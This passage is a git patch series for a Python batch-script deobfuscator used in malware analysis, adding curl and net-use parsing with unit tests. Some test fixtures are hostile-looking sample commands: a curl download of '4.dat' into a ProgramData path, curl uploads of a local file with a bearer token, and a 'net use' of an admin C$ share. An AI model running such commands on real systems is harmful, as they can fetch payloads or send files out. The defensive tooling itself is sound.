21d7a12..71523f0 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -119,7 +119,7 @@ def __init__(self, complex_one_liner_threshold=4): "__compat_layer": "DetectorsMessageBoxErrors", } - # There are 211 lines coming out of curl --help, so I won't be parsing all the options + # There are 211 lines coming out of curl --help, so we won't parse all the options self.curl_parser = argparse.ArgumentParser() # Data could be had multiple time, but since we don't use it, we can ignore it self.curl_parser.add_argument("-d", "--data", dest="data", help="Data to send") @@ -165,7 +165,7 @@ def find_closing_paren(self, statement): start_command = 0 for char in statement: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" 
elif char == "^": @@ -280,7 +280,7 @@ def get_commands(self, logical_line): start_command = 0 for char in logical_line: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" elif char == "^": @@ -302,7 +302,8 @@ def get_commands(self, logical_line): counter += 1 - last_com = logical_line[start_command:].strip() + # Remove leading spaces/tabs and trailing newlines + last_com = logical_line[start_command:].lstrip().rstrip("\r\n") if last_com != "": for part in self.get_commands_special_statement(last_com): yield part @@ -319,8 +320,7 @@ def get_value(self, variable): matches = re.finditer(str_substitution, variable, re.MULTILINE) value = "" - - for matchNum, match in enumerate(matches): + for match in matches: var_name = match.group("variable").lower() if var_name in self.variables: value = self.variables[var_name] @@ -736,10 +736,10 @@ def interpret_command(self, normalized_comm): if line_is_comment(normalized_comm): return - # We need to keep the last space in case the command is "set EXP=43 " so that the value will be "43 " + # We need to keep trailing spaces in case the command is "set EXP=43 ", so that the value will be "43 " # normalized_comm = normalized_comm.strip() - # remove paranthesis + # Remove parenthesis index = 0 last = len(normalized_comm) - 1 while index < last and (normalized_comm[index] == " " or normalized_comm[index] == "("): @@ -763,7 +763,7 @@ def interpret_command(self, normalized_comm): if len(normalized_comm_lower.split("/")[0]) < len(command): command = normalized_comm_lower.split("/")[0] - # Some commands like set cannot be split by double-quotes, but cmd and powershell can. + # Some commands like `set` cannot be split by double quotes, but `cmd` and `powershell` can. 
if '""' in command: ori_cmd_len = len(command) command = command.replace('""', "") @@ -778,7 +778,7 @@ def interpret_command(self, normalized_comm): command = self.modified_filesystem[command]["src"] if command == "call": - # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be remove + # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be removed. # This shouldn't work: # call @set EXP=43 # But this should: @@ -807,7 +807,7 @@ def interpret_command(self, normalized_comm): return if command == "set": - # interpreting set command + # Interpreting `set` command var_name, var_value = self.interpret_set(normalized_comm[3:]) if var_value == "": if var_name.lower() in self.variables: From 726c29f2849801d746de1792902b0cb965c9319b Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 11 Jun 2024 17:53:57 +0000 Subject: [PATCH 13/17] Handle multi-line commands --- batch_deobfuscator/batch_interpreter.py | 4 +-- tests/test_full_script.py | 46 +++++++++++++++++++++++++ tests/test_variables.py | 21 ----------- 3 files changed, 48 insertions(+), 23 deletions(-) create mode 100644 tests/test_full_script.py delete mode 100644 tests/test_variables.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 71523f0..9293868 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -152,12 +152,12 @@ def read_logical_line(self, path): with open(path, "r", encoding="utf-8", errors="ignore") as input_file: logical_line = "" for line in input_file: - if not line.endswith("^"): + if not line.rstrip("\r\n").endswith("^"): logical_line += line yield logical_line logical_line = "" else: - logical_line += line + "\n" + logical_line += line.rstrip("\r\n")[:-1] def find_closing_paren(self, statement): state = "init" diff --git a/tests/test_full_script.py b/tests/test_full_script.py new file mode 
100644 index 0000000..d3a935a --- /dev/null +++ b/tests/test_full_script.py @@ -0,0 +1,46 @@ +import os +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 +# A Grub file that contains a batch script +# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it +def test_in_check_infinite_recursion(): + deobfuscator = BatchDeobfuscator() + script = rb""" +if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit +call Fn.11 "%in_check%" "1" && exit 1 +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + # No assert, just making sure it does not error out. + + +def test_concat_logical_lines(): + deobfuscator = BatchDeobfuscator() + script = rb"""REM download log file +curl -X GET --fail ^ +-H "Accept: application/octet-stream" ^ +http://server.org/data?accept=data >>met\resultat\output.log""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + bat_filename, _ = deobfuscator.analyze(tf.name, temp_dir) + + with open(os.path.join(temp_dir, bat_filename), "rb") as f: + result = f.read() + lines = result.split(b"\r\n") + + assert len(lines) >= 2 + assert lines[0] == b"REM download log file" + assert lines[1] == ( + rb'curl -X GET --fail -H "Accept: application/octet-stream" ' + rb"http://server.org/data?accept=data >>met\resultat\output.log" + ) diff --git a/tests/test_variables.py b/tests/test_variables.py deleted file mode 100644 index 6a502cb..0000000 --- a/tests/test_variables.py +++ /dev/null @@ -1,21 +0,0 @@ -import tempfile - -from batch_deobfuscator.batch_interpreter import BatchDeobfuscator - - -# Taken from 
675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 -# A Grub file that contains a batch script -# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it -def test_in_check_infinite_recursion(): - deobfuscator = BatchDeobfuscator() - script = rb""" -if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit -call Fn.11 "%in_check%" "1" && exit 1 -""" - with tempfile.TemporaryDirectory() as temp_dir: - with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: - tf.write(script) - tf.flush() - deobfuscator.analyze(tf.name, temp_dir) - - # No assert, just making sure it does not error out. From 65e575794218f951bf323e3fb754cea08898647e Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 13 Jun 2024 12:00:33 +0000 Subject: [PATCH 14/17] Add more --data* option handling in curl --- batch_deobfuscator/batch_interpreter.py | 12 ++++++++++- tests/test_curl.py | 27 +++++++++++++++++++++++++ 2 files changed, 38 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 9293868..8a9f42b 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -122,7 +122,16 @@ def __init__(self, complex_one_liner_threshold=4): # There are 211 lines coming out of curl --help, so we won't parse all the options self.curl_parser = argparse.ArgumentParser() # Data could be had multiple time, but since we don't use it, we can ignore it - self.curl_parser.add_argument("-d", "--data", dest="data", help="Data to send") + self.curl_parser.add_argument( + "-d", + "--data", + "--data-ascii", + "--data-binary", + "--data-raw", + "--data-urlencode", + dest="data", + help="Data to send", + ) self.curl_parser.add_argument("-o", "--output", dest="output", help="Write to file instead of stdout") self.curl_parser.add_argument("-H", "--header", dest="header", 
help="Extra header to include") self.curl_parser.add_argument( @@ -760,6 +769,7 @@ def interpret_command(self, normalized_comm): normalized_comm_lower = normalized_comm.lower() command = normalized_comm_lower.split()[0] + # In case the command is `set/p`, we want only `set` if len(normalized_comm_lower.split("/")[0]) < len(command): command = normalized_comm_lower.split("/")[0] diff --git a/tests/test_curl.py b/tests/test_curl.py index a411b90..a330fe5 100644 --- a/tests/test_curl.py +++ b/tests/test_curl.py @@ -51,6 +51,33 @@ {"src": "http://localhost:5572/rc/noop?rutabaga=3&potato=4", "dst": None}, ), ), + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + {"src": "1.1.1.1/4.dat", "dst": "C:\\ProgramData\\Pterds\\HErtop.pos"}, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + { + "src": "http://server.com/data?style=table", + "dst": None, + }, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + { + "src": "http://server.com/upload?overwrite=true", + "dst": None, + }, + 
), + ), ], ) def test_curl_extraction(statement, download_trait): From 6ce5d18078c7c97a6f6099cfee9c4c97c7aac3d0 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 13 Jun 2024 12:02:39 +0000 Subject: [PATCH 15/17] Split curl command using windows command splitting instead of shlex --- batch_deobfuscator/batch_interpreter.py | 54 ++++++++++++++++++++++++- tests/test_curl.py | 7 ++++ 2 files changed, 60 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 8a9f42b..c3aa38a 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -7,6 +7,7 @@ import shlex import shutil import string +import sys import tempfile from collections import defaultdict from urllib.parse import urlparse @@ -53,6 +54,57 @@ def line_is_comment(line: str) -> bool: return False +# Taken from https://stackoverflow.com/questions/33560364/python-windows-parsing-command-lines-with-shlex +# An alternative would be https://github.com/smoofra/mslex or https://github.com/petamas/oslex (which use mslex) +def cmdline_split(s, platform="this"): + """Multi-platform variant of shlex.split() for command-line splitting. + For use with subprocess, for argv injection etc. Using fast REGEX. 
+ + platform: 'this' = auto from current platform; + 1 = POSIX; + 0 = Windows/CMD + (other values reserved) + """ + if platform == "this": + platform = sys.platform != "win32" + if platform == 1: + RE_CMD_LEX = r""""((?:\\["\\]|[^"])*)"|'([^']*)'|(\\.)|(&&?|\|\|?|\d?\>|[<])|([^\s'"\\&|<>]+)|(\s+)|(.)""" + elif platform == 0: + RE_CMD_LEX = r""""((?:""|\\["\\]|[^"])*)"?()|(\\\\(?=\\*")|\\")|(&&?|\|\|?|\d?>|[<])|([^\s"&|<>]+)|(\s+)|(.)""" + else: + raise AssertionError("unkown platform %r" % platform) + + args = [] + accu = None # collects pieces of one arg + for qs, qss, esc, pipe, word, white, fail in re.findall(RE_CMD_LEX, s): + if word: + pass # most frequent + elif esc: + word = esc[1] + elif white or pipe: + if accu is not None: + args.append(accu) + if pipe: + args.append(pipe) + accu = None + continue + elif fail: + raise ValueError("invalid or incomplete shell string") + elif qs: + word = qs.replace('\\"', '"').replace("\\\\", "\\") + if platform == 0: + word = word.replace('""', '"') + else: + word = qss # may be even empty; must be last + + accu = (accu or "") + word + + if accu is not None: + args.append(accu) + + return args + + class BatchDeobfuscator: def __init__(self, complex_one_liner_threshold=4): self.file_path = None @@ -494,7 +546,7 @@ def interpret_curl(self, cmd): # Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here cmd = cmd.replace('""', "") try: - split_cmd = shlex.split(cmd, posix=False) + split_cmd = cmdline_split(cmd, platform=0) except ValueError: # Probably a "No closing quotation" # Usually generated from corrupted or non-batch files diff --git a/tests/test_curl.py b/tests/test_curl.py index a330fe5..603197a 100644 --- a/tests/test_curl.py +++ b/tests/test_curl.py @@ -78,6 +78,13 @@ }, ), ), + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" 
\"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" \"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + {"src": "http://server.com/data.page", "dst": None}, + ), + ), ], ) def test_curl_extraction(statement, download_trait): From e515c648b7763924a6c86ca70049636e96a299c8 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Mon, 24 Jun 2024 15:58:40 +0000 Subject: [PATCH 16/17] Handle '@ ' broken deobfuscation --- batch_deobfuscator/batch_interpreter.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index c3aa38a..77d4c8b 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -819,6 +819,10 @@ def interpret_command(self, normalized_comm): if normalized_comm[0] == "@": normalized_comm = normalized_comm[1:] + # Verify that the command isn't '@ ' + if not normalized_comm.strip(): + return + normalized_comm_lower = normalized_comm.lower() command = normalized_comm_lower.split()[0] # In case the command is `set/p`, we want only `set` From 2be429109b4a654896492a92950659c4f80ab5d6 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 15 Aug 2024 15:49:44 +0000 Subject: [PATCH 17/17] Handle unquoted net use commands --- batch_deobfuscator/batch_interpreter.py | 4 +++- tests/test_net.py | 31 +++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git 
a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 77d4c8b..89a4df8 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -786,7 +786,9 @@ def interpret_net(self, cmd): info["password"] = extra_params.pop(0) if extra_params: - raise Exception(f"Too many parameters in net use: '{cmd}'") + # Either we're handling a corrupted script, or the path contains spaces without being properly quoted + # In that case, we'll assume no password was provided and will use all extra params as the server + info["server"] = " ".join([info["server"], info.pop("password")] + extra_params) if not info["options"]: info.pop("options") diff --git a/tests/test_net.py b/tests/test_net.py index 2b27846..594b3d4 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -146,6 +146,37 @@ def test_net_use_space(): ) +def test_net_use_space_no_quotes(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE Z: \\server\folder\No Quotes For Some Reason" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Z:", + "server": r"\\server\folder\No Quotes For Some Reason", + }, + ) + + +def test_net_use_from_text_blob(): + deobfuscator = BatchDeobfuscator() + # Found in 8d06dd9b902bd1d3fcf55ced6ceb2488903c337dde28e7ad1a9c94e9dc5cfd38 + cmd = r"net use x: \\\C$)." + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "x:", + "server": r"\\\C$).", + }, + ) + + def test_net_use_script(): deobfuscator = BatchDeobfuscator() script = rb"""